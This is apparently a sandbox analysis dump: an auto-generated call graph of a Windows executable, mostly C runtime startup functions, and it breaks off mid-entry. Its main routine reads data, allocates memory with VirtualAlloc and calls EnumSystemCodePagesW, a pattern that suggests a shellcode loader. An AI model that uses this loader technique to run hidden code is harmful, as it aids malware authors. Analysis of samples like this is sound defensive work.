calls 7656->7657 7658 3bad48 7657->7658 7658->7556 7729 3b3283 IsProcessorFeaturePresent 7730 3b32a9 7729->7730 7731 3bb303 7734 3bb314 7731->7734 7735 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7734->7735 7736 3bb326 7735->7736 7743 3bb791 7736->7743 7738 3bb346 7740 3bb791 __forcdecpt_l 65 API calls 7738->7740 7742 3bb310 7740->7742 7741 3bb332 7741->7738 7748 3bb623 7741->7748 7744 3bb7af 7743->7744 7745 3bb79d 7743->7745 7753 3bb64e 7744->7753 7745->7741 7749 3bb62f 7748->7749 7750 3bb640 7748->7750 7749->7741 7831 3bb5d1 7750->7831 7754 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7753->7754 7755 3bb661 7754->7755 7756 3bb6cd 7755->7756 7757 3bb66d 7755->7757 7758 3bb6eb 7756->7758 7772 3b917b 7756->7772 7764 3bb682 7757->7764 7765 3bc30c 7757->7765 7760 3b1cc3 __setmbcp 58 API calls 7758->7760 7762 3bb6f1 7758->7762 7760->7762 7775 3b7917 7762->7775 7764->7741 7766 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7765->7766 7767 3bc31e 7766->7767 7768 3b917b __isleadbyte_l 58 API calls 7767->7768 7771 3bc32b 7767->7771 7769 3bc34f 7768->7769 7780 3b7a55 7769->7780 7771->7764 7773 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7772->7773 7774 3b918c 7773->7774 7774->7758 7776 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7775->7776 7777 3b7928 7776->7777 7802 3b7713 7777->7802 7781 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7780->7781 7782 3b7a66 7781->7782 7785 3b795d 7782->7785 7786 3b7977 7785->7786 7787 3b7984 MultiByteToWideChar 7785->7787 7786->7787 7788 3b79a9 7787->7788 7790 3b79b0 7787->7790 7789 3b5770 __cftoe_l 6 API calls 7788->7789 7791 3b7a51 7789->7791 7793 3b114b _malloc 58 API calls 7790->7793 7796 3b79d2 _memset __crtLCMapStringA_stat 7790->7796 7791->7771 7792 3b7a0e MultiByteToWideChar 7794 3b7a38 7792->7794 7795 3b7a28 GetStringTypeW 7792->7795 7793->7796 7798 3b75c3 7794->7798 7795->7794 7796->7788 7796->7792 7799 3b75de 7798->7799 7800 3b75cd 7798->7800 7799->7788 7800->7799 7801 3b4831 _free 58 API calls 7800->7801 7801->7799 7804 3b772c MultiByteToWideChar 7802->7804 7805 3b778b 7804->7805 7809 3b7792 7804->7809 7806 3b5770 __cftoe_l 6 API calls 7805->7806 7807 3b7913 7806->7807 7807->7764 7808 3b77f1 MultiByteToWideChar 7810 3b780a 7808->7810 7826 3b7858 7808->7826 7811 3b114b _malloc 58 API calls 7809->7811 7814 3b77ba __crtLCMapStringA_stat 7809->7814 7827 3b7659 7810->7827 7811->7814 7813 3b75c3 __crtLCMapStringA_stat 58 API calls 7813->7805 7814->7805 7814->7808 7815 3b781e 7816 3b7834 7815->7816 7819 3b7860 7815->7819 7815->7826 7817 3b7659 __crtLCMapStringA_stat LCMapStringW 7816->7817 7816->7826 7817->7826 7818 3b7659 __crtLCMapStringA_stat LCMapStringW 7822 3b78cb 7818->7822 7820 3b114b _malloc 58 API calls 7819->7820 7824 3b7888 __crtLCMapStringA_stat 7819->7824 7820->7824 7821 3b78f3 7823 3b75c3 __crtLCMapStringA_stat 58 API calls 7821->7823 7822->7821 7825 3b78e5 WideCharToMultiByte 7822->7825 7823->7826 7824->7818 7824->7826 7825->7821 7826->7813 7828 3b7669 7827->7828 7829 3b7684 __crtLCMapStringA_stat 7827->7829 7828->7815 7830 3b769b LCMapStringW 7829->7830 7830->7815 7832 3b4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7831->7832 7833 3bb5e2 7832->7833 7834 3bb5f9 7833->7834 7835 3bc30c __isctype_l 61 API calls 7833->7835 7834->7741 7835->7834 6075 3b15c0 6076 3b15cc _flsall 6075->6076 6112 3b407f GetStartupInfoW 6076->6112 6078 3b15d1 6114 3b1d17 GetProcessHeap 6078->6114 6080 3b1629 6081 3b1634 6080->6081 6194 3b1710 6080->6194 6115 3b3815 6081->6115 6084 3b163a 6085 3b1645 __RTC_Initialize 6084->6085 6086 3b1710 _fast_error_exit 58 API calls 6084->6086 6136 3b38a8 6085->6136 6086->6085 6088 3b1654 6089 3b1660 GetCommandLineW 6088->6089 6090 3b1710 _fast_error_exit 58 API calls 6088->6090 6155 3b3fa4 GetEnvironmentStringsW 6089->6155 6092 3b165f 6090->6092 6092->6089 6095 3b167a 6096 3b1685 6095->6096 6202 3b17be 6095->6202 6165 3b3d99 6096->6165 6099 3b168b 6100 3b1696 6099->6100 6101 3b17be __lock 58 API calls 6099->6101 6179 3b17f8 6100->6179 6101->6100 6103 3b16a9 __wwincmdln 6185 3b1000 6103->6185 6104 3b169e 6104->6103 6105 3b17be __lock 58 API calls 6104->6105 6105->6103 6108 3b16cc 6212 3b17e9 6108->6212 6111 3b16d1 _flsall 6113 3b4095 6112->6113 6113->6078 6114->6080 6215 3b1890 RtlEncodePointer 6115->6215 6117 3b381a 6221 3b4560 6117->6221 6120 3b3823 6225 3b388b 6120->6225 6125 3b3840 6237 3b4869 6125->6237 6128 3b3882 6130 3b388b __mtterm 61 API calls 6128->6130 6132 3b3887 6130->6132 6131 3b3861 6131->6128 6133 3b3867 6131->6133 6132->6084 6246 3b3762 6133->6246 6135 3b386f GetCurrentThreadId 6135->6084 6137 3b38b4 _flsall 6136->6137 6138 3b442f __lock 58 API calls 6137->6138 6139 3b38bb 6138->6139 6140 3b4869 __calloc_crt 58 API calls 6139->6140 6142 3b38cc 6140->6142 6141 3b3937 GetStartupInfoW 6143 3b3a7b 6141->6143 6144 3b394c 6141->6144 6142->6141 6145 3b38d7 _flsall @_EH4_CallFilterFunc@8 6142->6145 6146 3b3b43 6143->6146 6149 3b3ac8 GetStdHandle 6143->6149 6150 3b3adb GetFileType 6143->6150 6154 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6143->6154 6144->6143 6148 3b4869 __calloc_crt 58 API calls 6144->6148 6151 3b399a 6144->6151 6145->6088 6510 3b3b53 6146->6510 6148->6144 6149->6143 6150->6143 6151->6143 6152 3b39ce GetFileType 6151->6152 6153 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6151->6153 6152->6151 6153->6151 6154->6143 6156 3b1670 6155->6156 6157 3b3fb5 6155->6157 6161 3b3b5c GetModuleFileNameW 6156->6161 6158 3b48b1 __malloc_crt 58 API calls 6157->6158 6160 3b3fdb _memmove 6158->6160 6159 3b3ff1 FreeEnvironmentStringsW 6159->6156 6160->6159 6162 3b3b90 _wparse_cmdline 6161->6162 6163 3b48b1 __malloc_crt 58 API calls 6162->6163 6164 3b3bd0 _wparse_cmdline 6162->6164 6163->6164 6164->6095 6166 3b3db2 __NMSG_WRITE 6165->6166 6170 3b3daa 6165->6170 6167 3b4869 __calloc_crt 58 API calls 6166->6167 6168 3b3ddb __NMSG_WRITE 6167->6168 6168->6170 6171 3b3e32 6168->6171 6172 3b4869 __calloc_crt 58 API calls 6168->6172 6173 3b3e57 6168->6173 6175 3b5457 __NMSG_WRITE 58 API calls 6168->6175 6176 3b3e6e 6168->6176 6169 3b4831 _free 58 API calls 6169->6170 6170->6099 6171->6169 6172->6168 6174 3b4831 _free 58 API calls 6173->6174 6174->6170 6175->6168 6177 3b1e99 __invoke_watson 8 API calls 6176->6177 6178 3b3e7a 6177->6178 6178->6099 6180 3b1804 __IsNonwritableInCurrentImage 6179->6180 6514 3b4942 6180->6514 6182 3b1822 __initterm_e 6184 3b1841 _doexit __IsNonwritableInCurrentImage 6182->6184 6517 3b481c 6182->6517 6184->6104 6186 3b114b _malloc 58 API calls 6185->6186 6187 3b1013 6186->6187 6583 3b11dd 6187->6583 6191 3b1088 6191->6108 6209 3b1a61 6191->6209 6192 3b104d _memset 6192->6191 6193 3b107f EnumSystemCodePagesW 6192->6193 6193->6191 6195 3b171c 6194->6195 6196 3b1721 6194->6196 6197 3b1a75 __FF_MSGBANNER 58 API calls 6195->6197 6198 3b1ad2 __NMSG_WRITE 58 API calls 6196->6198 6197->6196 6199 3b1729 6198->6199 6200 3b17a8 __mtinitlocknum 3 API calls 6199->6200 6201 3b1733 6200->6201 6201->6081 6203 3b1a75 __FF_MSGBANNER 58 API calls 6202->6203 6204 3b17c6 6203->6204 6205 3b1ad2 __NMSG_WRITE 58 API calls 6204->6205 6206 3b17ce 6205->6206 7290 3b187c 6206->7290 6210 3b1932 _doexit 58 API calls 6209->6210 6211 3b1a70 6210->6211 6211->6108 6213 3b1932 _doexit 58 API calls 6212->6213 6214 3b17f4 6213->6214 6214->6111 6256 3b1767 6215->6256 6217 3b18a1 __init_pointers __initp_misc_winsig 6257 3b4995 EncodePointer 6217->6257 6219 3b18b9 __init_pointers 6220 3b4110 34 API calls 6219->6220 6220->6117 6222 3b456c 6221->6222 6224 3b381f 6222->6224 6258 3b40a2 6222->6258 6224->6120 6234 3b4001 6224->6234 6226 3b3895 6225->6226 6231 3b389b 6225->6231 6261 3b401f 6226->6261 6228 3b4479 DeleteCriticalSection 6264 3b4831 6228->6264 6229 3b4495 6232 3b44a1 DeleteCriticalSection 6229->6232 6233 3b3828 6229->6233 6231->6228 6231->6229 6232->6229 6233->6084 6235 3b4018 TlsAlloc 6234->6235 6236 3b3835 6234->6236 6236->6120 6236->6125 6240 3b4870 6237->6240 6239 3b384d 6239->6128 6243 3b405d 6239->6243 6240->6239 6242 3b488e 6240->6242 6290 3b74fd 6240->6290 6242->6239 6242->6240 6298 3b43a9 Sleep 6242->6298 6244 3b4073 6243->6244 6245 3b4077 TlsSetValue 6243->6245 6244->6131 6245->6131 6247 3b376e _flsall 6246->6247 6301 3b442f 6247->6301 6249 3b37ab 6308 3b3803 6249->6308 6252 3b442f __lock 58 API calls 6253 3b37cc ___addlocaleref 6252->6253 6311 3b380c 6253->6311 6255 3b37f7 _flsall 6255->6135 6256->6217 6257->6219 6259 3b40bf InitializeCriticalSectionAndSpinCount 6258->6259 6260 3b40b2 6258->6260 6259->6222 6260->6222 6262 3b4032 6261->6262 6263 3b4036 TlsFree 6261->6263 6262->6231 6263->6231 6265 3b483a HeapFree 6264->6265 6269 3b4863 __dosmaperr 6264->6269 6266 3b484f 6265->6266 6265->6269 6270 3b1cc3 6266->6270 6269->6231 6273 3b36f3 GetLastError 6270->6273 6272 3b1cc8 GetLastError 6272->6269 6287 3b403e 6273->6287 6275 3b3708 6276 3b3756 SetLastError 6275->6276 6277 3b4869 __calloc_crt 55 API calls 6275->6277 6276->6272 6278 3b371b 6277->6278 6278->6276 6279 3b405d __getptd_noexit TlsSetValue 6278->6279 6280 3b372f 6279->6280 6281 3b374d 6280->6281 6282 3b3735 6280->6282 6283 3b4831 _free 55 API calls 6281->6283 6284 3b3762 __initptd 55 API calls 6282->6284 6286 3b3753 6283->6286 6285 3b373d GetCurrentThreadId 6284->6285 6285->6276 6286->6276 6288 3b4051 6287->6288 6289 3b4055 TlsGetValue 6287->6289 6288->6275 6289->6275 6291 3b7508 6290->6291 6294 3b7523 6290->6294 6292 3b7514 6291->6292 6291->6294 6293 3b1cc3 __setmbcp 57 API calls 6292->6293 6296 3b7519 6293->6296 6295 3b7533 HeapAlloc 6294->6295 6294->6296 6299 3b1741 DecodePointer 6294->6299 6295->6294 6295->6296 6296->6240 6298->6242 6300 3b1754 6299->6300 6300->6294 6302 3b4453 EnterCriticalSection 6301->6302 6303 3b4440 6301->6303 6302->6249 6314 3b44b7 6303->6314 6305 3b4446 6305->6302 6306 3b17be __lock 57 API calls 6305->6306 6307 3b4452 6306->6307 6307->6302 6508 3b4599 LeaveCriticalSection 6308->6508 6310 3b37c5 6310->6252 6509 3b4599 LeaveCriticalSection 6311->6509 6313 3b3813 6313->6255 6315 3b44c3 _flsall 6314->6315 6316 3b44cc 6315->6316 6317 3b44e4 6315->6317 6338 3b1a75 6316->6338 6323 3b4505 _flsall 6317->6323 6380 3b48b1 6317->6380 6323->6305 6325 3b450f 6328 3b442f __lock 58 API calls 6325->6328 6326 3b4500 6327 3b1cc3 __setmbcp 58 API calls 6326->6327 6327->6323 6330 3b4516 6328->6330 6332 3b453b 6330->6332 6333 3b4523 6330->6333 6335 3b4831 _free 58 API calls 6332->6335 6334 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6333->6334 6336 3b452f 6334->6336 6335->6336 6386 3b4557 6336->6386 6389 3b3e88 6338->6389 6340 3b1a7c 6341 3b3e88 __FF_MSGBANNER 58 API calls 6340->6341 6343 3b1a89 6340->6343 6341->6343 6342 3b1ad2 __NMSG_WRITE 58 API calls 6344 3b1aa1 6342->6344 6343->6342 6345 3b1aab 6343->6345 6346 3b1ad2 __NMSG_WRITE 58 API calls 6344->6346 6347 3b1ad2 6345->6347 6346->6345 6348 3b1af0 __NMSG_WRITE 6347->6348 6349 3b1c17 6348->6349 6350 3b3e88 __FF_MSGBANNER 55 API calls 6348->6350 6471 3b5770 6349->6471 6352 3b1b03 6350->6352 6354 3b1c1c GetStdHandle 6352->6354 6355 3b3e88 __FF_MSGBANNER 55 API calls 6352->6355 6353 3b1c80 6377 3b17a8 6353->6377 6354->6349 6358 3b1c2a _strlen 6354->6358 6356 3b1b14 6355->6356 6356->6354 6357 3b1b26 6356->6357 6357->6349 6419 3b5457 6357->6419 6358->6349 6360 3b1c63 WriteFile 6358->6360 6360->6349 6362 3b1b53 GetModuleFileNameW 6364 3b1b73 6362->6364 6368 3b1b83 __NMSG_WRITE 6362->6368 6363 3b1c84 6365 3b1e99 __invoke_watson 8 API calls 6363->6365 6366 3b5457 __NMSG_WRITE 55 API calls 6364->6366 6367 3b1c8e 6365->6367 6366->6368 6368->6363 6369 3b1bc9 6368->6369 6428 3b54cc 6368->6428 6369->6363 6437 3b53eb 6369->6437 6373 3b53eb __NMSG_WRITE 55 API calls 6374 3b1c00 6373->6374 6374->6363 6375 3b1c07 6374->6375 6446 3b558a EncodePointer 6375->6446 6486 3b1774 GetModuleHandleExW 6377->6486 6382 3b48bf 6380->6382 6383 3b44f9 6382->6383 6384 3b48d2 6382->6384 6489 3b114b 6382->6489 6383->6325 6383->6326 6384->6382 6384->6383 6506 3b43a9 Sleep 6384->6506 6507 3b4599 LeaveCriticalSection 6386->6507 6388 3b455e 6388->6323 6390 3b3e92 6389->6390 6391 3b1cc3 __setmbcp 58 API calls 6390->6391 6392 3b3e9c 6390->6392 6393 3b3eb8 6391->6393 6392->6340 6396 3b1e89 6393->6396 6399 3b1e5e DecodePointer 6396->6399 6400 3b1e71 6399->6400 6405 3b1e99 IsProcessorFeaturePresent 6400->6405 6403 3b1e5e __wcsnicmp_l 8 API calls 6404 3b1e95 6403->6404 6404->6340 6406 3b1ea4 6405->6406 6411 3b1d2c 6406->6411 6410 3b1e88 6410->6403 6412 3b1d46 _memset __call_reportfault 6411->6412 6413 3b1d66 IsDebuggerPresent 6412->6413 6414 3b43cc __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6413->6414 6416 3b1e2a __call_reportfault 6414->6416 6415 3b5770 __cftoe_l 6 API calls 6417 3b1e4d 6415->6417 6416->6415 6418 3b43b7 GetCurrentProcess TerminateProcess 6417->6418 6418->6410 6420 3b5462 6419->6420 6422 3b5470 6419->6422 6420->6422 6425 3b5489 6420->6425 6421 3b1cc3 __setmbcp 58 API calls 6423 3b547a 6421->6423 6422->6421 6424 3b1e89 __wcsnicmp_l 9 API calls 6423->6424 6426 3b1b46 6424->6426 6425->6426 6427 3b1cc3 __setmbcp 58 API calls 6425->6427 6426->6362 6426->6363 6427->6423 6432 3b54da 6428->6432 6429 3b54de 6430 3b54e3 6429->6430 6431 3b1cc3 __setmbcp 58 API calls 6429->6431 6430->6369 6433 3b550e 6431->6433 6432->6429 6432->6430 6435 3b551d 6432->6435 6434 3b1e89 __wcsnicmp_l 9 API calls 6433->6434 6434->6430 6435->6430 6436 3b1cc3 __setmbcp 58 API calls 6435->6436 6436->6433 6438 3b5405 6437->6438 6440 3b53f7 6437->6440 6439 3b1cc3 __setmbcp 58 API calls 6438->6439 6445 3b540f 6439->6445 6440->6438 6443 3b5431 6440->6443 6441 3b1e89 __wcsnicmp_l 9 API calls 6442 3b1be9 6441->6442 6442->6363 6442->6373 6443->6442 6444 3b1cc3 __setmbcp 58 API calls 6443->6444 6444->6445 6445->6441 6447 3b55be ___crtIsPackagedApp 6446->6447 6448 3b567d IsDebuggerPresent 6447->6448 6449 3b55cd LoadLibraryExW 6447->6449 6450 3b56a2 6448->6450 6451 3b5687 6448->6451 6452 3b560a GetProcAddress 6449->6452 6453 3b55e4 GetLastError 6449->6453 6455 3b56a7 DecodePointer 6450->6455 6459 3b5695 6450->6459 6454 3b568e OutputDebugStringW 6451->6454 6451->6459 6457 3b561e 7 API calls 6452->6457 6458 3b569a 6452->6458 6456 3b55f3 LoadLibraryExW 6453->6456 6453->6458 6454->6459 6455->6458 6456->6452 6456->6458 6460 3b567a 6457->6460 6461 3b5666 GetProcAddress EncodePointer 6457->6461 6462 3b5770 __cftoe_l 6 API calls 6458->6462 6459->6458 6465 3b56ce DecodePointer DecodePointer 6459->6465 6469 3b56e6 6459->6469 6460->6448 6461->6460 6466 3b576c 6462->6466 6463 3b571e DecodePointer 6464 3b570a DecodePointer 6463->6464 6467 3b5725 6463->6467 6464->6458 6465->6469 6466->6349 6467->6464 6470 3b5736 DecodePointer 6467->6470 6469->6463 6469->6464 6470->6464 6472 3b577a IsProcessorFeaturePresent 6471->6472 6473 3b5778 6471->6473 6475 3b7ae6 6472->6475 6473->6353 6478 3b7a95 IsDebuggerPresent 6475->6478 6479 3b7aaa __call_reportfault 6478->6479 6484 3b43cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6479->6484 6481 3b7ab2 __call_reportfault 6485 3b43b7 GetCurrentProcess TerminateProcess 6481->6485 6483 3b7acf 6483->6353 6484->6481 6485->6483 6487 3b178d GetProcAddress 6486->6487 6488 3b179f ExitProcess 6486->6488 6487->6488 6490 3b11c6 6489->6490 6495 3b1157 6489->6495 6491 3b1741 __calloc_impl DecodePointer 6490->6491 6492 3b11cc 6491->6492 6496 3b1cc3 __setmbcp 57 API calls 6492->6496 6493 3b1162 6494 3b1a75 __FF_MSGBANNER 57 API calls 6493->6494 6493->6495 6499 3b1ad2 __NMSG_WRITE 57 API calls 6493->6499 6502 3b17a8 __mtinitlocknum 3 API calls 6493->6502 6494->6493 6495->6493 6497 3b118a RtlAllocateHeap 6495->6497 6500 3b11b2 6495->6500 6503 3b1741 __calloc_impl DecodePointer 6495->6503 6504 3b11b0 6495->6504 6498 3b11be 6496->6498 6497->6495 6497->6498 6498->6382 6499->6493 6501 3b1cc3 __setmbcp 57 API calls 6500->6501 6501->6504 6502->6493 6503->6495 6505 3b1cc3 __setmbcp 57 API calls 6504->6505 6505->6498 6506->6384 6507->6388 6508->6310 6509->6313 6513 3b4599 LeaveCriticalSection 6510->6513 6512 3b3b5a 6512->6145 6513->6512 6515 3b4945 EncodePointer 6514->6515 6515->6515 6516 3b495f 6515->6516 6516->6182 6520 3b4720 6517->6520 6519 3b4827 6519->6184 6521 3b472c _flsall 6520->6521 6528 3b1920 6521->6528 6527 3b4753 _flsall 6527->6519 6529 3b442f __lock 58 API calls 6528->6529 6530 3b1927 6529->6530 6531 3b4764 DecodePointer DecodePointer 6530->6531 6532 3b4741 6531->6532 6533 3b4791 6531->6533 6542 3b475e 6532->6542 6533->6532 6545 3b7421 6533->6545 6535 3b47f4 EncodePointer EncodePointer 6535->6532 6536 3b47c8 6536->6532 6539 3b48f8 __realloc_crt 61 API calls 6536->6539 6540 3b47e2 EncodePointer 6536->6540 6537 3b47a3 6537->6535 6537->6536 6552 3b48f8 6537->6552 6541 3b47dc 6539->6541 6540->6535 6541->6532 6541->6540 6579 3b1929 6542->6579 6546 3b742a 6545->6546 6547 3b743f HeapSize 6545->6547 6548 3b1cc3 __setmbcp 58 API calls 6546->6548 6547->6537 6549 3b742f 6548->6549 6550 3b1e89 __wcsnicmp_l 9 API calls 6549->6550 6551 3b743a 6550->6551 6551->6537 6554 3b48ff 6552->6554 6555 3b493c 6554->6555 6557 3b7452 6554->6557 6578 3b43a9 Sleep 6554->6578 6555->6536 6558 3b745b 6557->6558 6559 3b7466 6557->6559 6560 3b114b _malloc 58 API calls 6558->6560 6561 3b746e 6559->6561 6570 3b747b 6559->6570 6562 3b7463 6560->6562 6563 3b4831 _free 58 API calls 6561->6563 6562->6554 6577 3b7476 __dosmaperr 6563->6577 6564 3b74b3 6565 3b1741 __calloc_impl DecodePointer 6564->6565 6567 3b74b9 6565->6567 6566 3b7483 HeapReAlloc 6566->6570 6566->6577 6568 3b1cc3 __setmbcp 58 API calls 6567->6568 6568->6577 6569 3b74e3 6572 3b1cc3 __setmbcp 58 API calls 6569->6572 6570->6564 6570->6566 6570->6569 6571 3b1741 __calloc_impl DecodePointer 6570->6571 6574 3b74cb 6570->6574 6571->6570 6573 3b74e8 GetLastError 6572->6573 6573->6577 6575 3b1cc3 __setmbcp 58 API calls 6574->6575 6576 3b74d0 GetLastError 6575->6576 6576->6577 6577->6554 6578->6554 6582 3b4599 LeaveCriticalSection 6579->6582 6581 3b1930 6581->6527 6582->6581 6589 3b11f2 6583->6589 6585 3b1025 VirtualAlloc 6586 3b1481 6585->6586 7105 3b149c 6586->7105 6588 3b1497 6588->6192 6592 3b11fe _flsall 6589->6592 6590 3b1211 6591 3b1cc3 __setmbcp 58 API calls 6590->6591 6593 3b1216 6591->6593 6592->6590 6594 3b1242 6592->6594 6595 3b1e89 __wcsnicmp_l 9 API calls 6593->6595 6608 3b2034 6594->6608 6605 3b1221 _flsall @_EH4_CallFilterFunc@8 6595->6605 6597 3b1247 6598 3b125d 6597->6598 6599 3b1250 6597->6599 6600 3b1287 6598->6600 6601 3b1267 6598->6601 6602 3b1cc3 __setmbcp 58 API calls 6599->6602 6623 3b2153 6600->6623 6603 3b1cc3 __setmbcp 58 API calls 6601->6603 6602->6605 6603->6605 6605->6585 6609 3b2040 _flsall 6608->6609 6610 3b442f __lock 58 API calls 6609->6610 6621 3b204e 6610->6621 6611 3b20c2 6641 3b214a 6611->6641 6612 3b20c9 6614 3b48b1 __malloc_crt 58 API calls 6612->6614 6616 3b20d0 6614->6616 6615 3b213f _flsall 6615->6597 6616->6611 6618 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6616->6618 6620 3b20f6 EnterCriticalSection 6618->6620 6619 3b44b7 __mtinitlocknum 58 API calls 6619->6621 6620->6611 6621->6611 6621->6612 6621->6619 6644 3b1f9d 6621->6644 6649 3b2007 6621->6649 6624 3b2173 __wopenfile 6623->6624 6625 3b218d 6624->6625 6637 3b2348 6624->6637 6659 3b62b3 6624->6659 6626 3b1cc3 __setmbcp 58 API calls 6625->6626 6627 3b2192 6626->6627 6628 3b1e89 __wcsnicmp_l 9 API calls 6627->6628 6630 3b1292 6628->6630 6629 3b23ab 6656 3b625f 6629->6656 6638 3b12b4 6630->6638 6634 3b62b3 __wcsnicmp 60 API calls 6635 3b2360 6634->6635 6636 3b62b3 __wcsnicmp 60 API calls 6635->6636 6635->6637 6636->6637 6637->6625 6637->6629 7098 3b1fcd 6638->7098 6640 3b12ba 6640->6605 6654 3b4599 LeaveCriticalSection 6641->6654 6643 3b2151 6643->6615 6645 3b1fa8 6644->6645 6646 3b1fbe EnterCriticalSection 6644->6646 6647 3b442f __lock 58 API calls 6645->6647 6646->6621 6648 3b1fb1 6647->6648 6648->6621 6650 3b2028 LeaveCriticalSection 6649->6650 6651 3b2015 6649->6651 6650->6621 6655 3b4599 LeaveCriticalSection 6651->6655 6653 3b2025 6653->6621 6654->6643 6655->6653 6667 3b5a43 6656->6667 6658 3b6278 6658->6630 6660 3b6351 6659->6660 6662 3b62c5 6659->6662 7010 3b6369 6660->7010 6663 3b1cc3 __setmbcp 58 API calls 6662->6663 6666 3b2341 6662->6666 6664 3b62de 6663->6664 6665 3b1e89 __wcsnicmp_l 9 API calls 6664->6665 6665->6666 6666->6634 6666->6637 6670 3b5a4f _flsall 6667->6670 6668 3b5a65 6669 3b1cc3 __setmbcp 58 API calls 6668->6669 6671 3b5a6a 6669->6671 6670->6668 6672 3b5a9b 6670->6672 6673 3b1e89 __wcsnicmp_l 9 API calls 6671->6673 6678 3b5b0c 6672->6678 6677 3b5a74 _flsall 6673->6677 6675 3b5ab7 6752 3b5ae0 6675->6752 6677->6658 6679 3b5b2c 6678->6679 6756 3b8a18 6679->6756 6681 3b1e99 __invoke_watson 8 API calls 6683 3b625e 6681->6683 6682 3b5b48 6684 3b5b82 6682->6684 6692 3b5ba5 6682->6692 6700 3b5c7f 6682->6700 6685 3b5a43 __wsopen_helper 103 API calls 6683->6685 6787 3b1c8f 6684->6787 6686 3b6278 6685->6686 6686->6675 6689 3b1cc3 __setmbcp 58 API calls 6690 3b5b94 6689->6690 6693 3b1e89 __wcsnicmp_l 9 API calls 6690->6693 6691 3b5c63 6694 3b1c8f __dosmaperr 58 API calls 6691->6694 6692->6691 6695 3b5c41 6692->6695 6720 3b5b9e 6693->6720 6696 3b5c68 6694->6696 6763 3b6d16 6695->6763 6697 3b1cc3 __setmbcp 58 API calls 6696->6697 6698 3b5c75 6697->6698 6699 3b1e89 __wcsnicmp_l 9 API calls 6698->6699 6699->6700 6700->6681 6702 3b5d0f 6703 3b5d19 6702->6703 6704 3b5d3c 6702->6704 6705 3b1c8f __dosmaperr 58 API calls 6703->6705 6781 3b59bb 6704->6781 6707 3b5d1e 6705->6707 6708 3b1cc3 __setmbcp 58 API calls 6707->6708 6710 3b5d28 6708->6710 6709 3b5ddc GetFileType 6711 3b5e29 6709->6711 6712 3b5de7 GetLastError 6709->6712 6715 3b1cc3 __setmbcp 58 API calls 6710->6715 6795 3b6fac 6711->6795 6716 3b1ca2 __dosmaperr 58 API calls 6712->6716 6713 3b5daa GetLastError 6790 3b1ca2 6713->6790 6715->6720 6721 3b5e0e CloseHandle 6716->6721 6718 3b59bb ___createFile 3 API calls 6722 3b5d9f 6718->6722 6719 3b5dcf 6725 3b1cc3 __setmbcp 58 API calls 6719->6725 6720->6675 6721->6719 6724 3b5e1c 6721->6724 6722->6709 6722->6713 6726 3b1cc3 __setmbcp 58 API calls 6724->6726 6725->6700 6727 3b5e21 6726->6727 6727->6719 6728 3b6002 6728->6700 6731 3b61d5 CloseHandle 6728->6731 6733 3b59bb ___createFile 3 API calls 6731->6733 6735 3b61fc 6733->6735 6734 3b2a2a 70 API calls __read_nolock 6748 3b5ec8 6734->6748 6737 3b608c 6735->6737 6738 3b6204 GetLastError 6735->6738 6736 3b1c8f __dosmaperr 58 API calls 6736->6748 6737->6700 6739 3b1ca2 __dosmaperr 58 API calls 6738->6739 6741 3b6210 6739->6741 6740 3b5ed0 6740->6748 6813 3b897e 6740->6813 6828 3b86ed 6740->6828 6887 3b6ebf 6741->6887 6746 3b607f 6747 3b897e __close_nolock 61 API calls 6746->6747 6749 3b6086 6747->6749 6748->6728 6748->6734 6748->6740 6748->6746 6750 3b7054 60 API calls __lseeki64_nolock 6748->6750 6859 3b7d99 6748->6859 6751 3b1cc3 __setmbcp 58 API calls 6749->6751 6750->6748 6751->6737 6753 3b5b0a 6752->6753 6754 3b5ae6 6752->6754 6753->6677 7009 3b702e LeaveCriticalSection 6754->7009 6757 3b8a22 6756->6757 6758 3b8a37 6756->6758 6759 3b1cc3 __setmbcp 58 API calls 6757->6759 6758->6682 6760 3b8a27 6759->6760 6761 3b1e89 __wcsnicmp_l 9 API calls 6760->6761 6762 3b8a32 6761->6762 6762->6682 6764 3b6d22 _flsall 6763->6764 6765 3b44b7 __mtinitlocknum 58 API calls 6764->6765 6766 3b6d33 6765->6766 6767 3b442f __lock 58 API calls 6766->6767 6768 3b6d38 _flsall 6766->6768 6777 3b6d46 6767->6777 6768->6702 6769 3b6e94 6908 3b6eb6 6769->6908 6771 3b6e26 6772 3b4869 __calloc_crt 58 API calls 6771->6772 6775 3b6e2f 6772->6775 6773 3b6dc6 EnterCriticalSection 6776 3b6dd6 LeaveCriticalSection 6773->6776 6773->6777 6774 3b442f __lock 58 API calls 6774->6777 6775->6769 6899 3b6c88 6775->6899 6776->6777 6777->6769 6777->6771 6777->6773 6777->6774 6779 3b40a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6777->6779 6896 3b6dee 6777->6896 6779->6777 6782 3b59c6 ___crtIsPackagedApp 6781->6782 6783 3b59ca GetModuleHandleW GetProcAddress 6782->6783 6784 3b5a21 CreateFileW 6782->6784 6786 3b59e7 6783->6786 6785 3b5a3f 6784->6785 6785->6709 6785->6713 6785->6718 6786->6785 6788 3b36f3 __getptd_noexit 58 API calls 6787->6788 6789 3b1c94 6788->6789 6789->6689 6791 3b1c8f __dosmaperr 58 API calls 6790->6791 6792 3b1cab __dosmaperr 6791->6792 6793 3b1cc3 __setmbcp 58 API calls 6792->6793 6794 3b1cbe 6793->6794 6794->6719 6796 3b6fb8 6795->6796 6797 3b7014 6795->6797 6796->6797 6803 3b6fda 6796->6803 6798 3b1cc3 __setmbcp 58 API calls 6797->6798 6799 3b7019 6798->6799 6800 3b1c8f __dosmaperr 58 API calls 6799->6800 6801 3b5e47 6800->6801 6801->6728 6801->6748 6804 3b7054 6801->6804 6802 3b6fff SetStdHandle 6802->6801 6803->6801 6803->6802 6916 3b6f45 6804->6916 6806 3b7064 6807 3b707d SetFilePointerEx 6806->6807 6808 3b706c 6806->6808 6810 3b7095 GetLastError 6807->6810 6811 3b5eb1 6807->6811 6809 3b1cc3 __setmbcp 58 API 